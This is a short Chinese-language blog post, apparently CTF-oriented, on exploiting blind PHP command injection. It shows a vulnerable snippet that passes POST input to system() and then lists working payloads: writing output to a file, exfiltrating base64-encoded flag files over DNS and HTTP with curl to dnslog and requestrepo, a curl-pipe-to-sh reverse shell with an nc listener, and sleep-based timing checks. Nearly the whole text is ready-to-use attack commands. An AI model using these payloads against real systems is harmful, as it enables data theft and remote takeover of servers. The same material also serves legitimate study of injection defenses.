php--无回显情况下的命令执行

免责声明:本文仅做技术交流与学习...

目录

绕过模版:

[1. 写入文件、二次返回:](#1. 写入文件、二次返回:)

[2. DNS信道:](#2. DNS信道:)

3.http信道:

[4.反弹shell信道 -->公网IP](#4.反弹shell信道 -->公网IP)

[5.延时 sleep 3](#5.延时 sleep 3)


建立通道(信道) --数据传输的路径

shell_exec 与 system 相比,shell_exec没有回显结果.

绕过模版:

<?php

echo "hello world";

命令执行:

cmd=_POST'cmd';

system($cmd);

?>

1. 写入文件、二次返回:

/?cmd=whoami>1.txt

再访问1.txt:

/?cmd=cat fl?g.php>1.txt


2. DNS信道:

dnslog.cn

/?cmd=ping -c 1 `执行命令`.域名 --1次解析

/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:0:10}.域名 --一次带出的字符有限.

/?cmd=a=`sed -n "3,4p" fla?.php`;curl${a:10:30}.域名

/?cmd=a=`sed -n "3,4p" fla?.php|base64`;curl${a:10:30}.域名 --base64编码


3.http信道:

https://requestrepo.com/#/

https://requestrepo.com/#/

(看get请求包)

/?cmd=curl http://域名/?1=\`ls .|base64`

/?cmd=curl http://域名/?1=\`cat fl?g.php|base64`


4.反弹shell信道 -->公网IP

https://your-shell.com/

https://your-shell.com/

(用微软的浏览器访问.)

curl https://your-shell.com/\<your公网ip>:1337 | sh

/?cmd=curl https://your-shell.com/\<your公网ip>:1337 | sh

服务器: nc -lvvnp 1337


5.延时 sleep 3

--麻烦啊

&2=sleep 3 ||还可验证命令执行.


相关推荐
喜欢就别4 小时前
【Agentic RL / 强化学习 / OPD】OpenClaw-RL 源码阅读笔记 --- (2)--- On-Policy Distillation
人工智能·笔记
Lhappy嘻嘻6 小时前
Java IO|File 文件操作 + 字节流 / 字符流完整笔记 + 递归删除文件实战
java·笔记·php
Championship.23.246 小时前
Linux 3.0 锁机制与故障排查详解
linux·运维·服务器
科技道人6 小时前
记录 默认置灰/禁用 app ‘Search Engine Selector‘ 的disable按钮
开发语言·前端·javascript
QYR-分析8 小时前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人
风123456789~8 小时前
【Linux专栏】ls 排除某个文件
linux·运维·服务器
IpdataCloud8 小时前
担心IP暴露隐私?用安全IP查询工具自查,三步配置网络出口
网络·tcp/ip·安全·ip
GLDbalala8 小时前
GPU PRO 5 - 4.6 Adaptive Scalable Texture Compression 笔记
笔记
xian_wwq8 小时前
【学习笔记】模型权重管理:Safetensors与私有化Hub(23/35)
笔记·学习
逝水无殇8 小时前
C# 异常处理详解
开发语言·后端·c#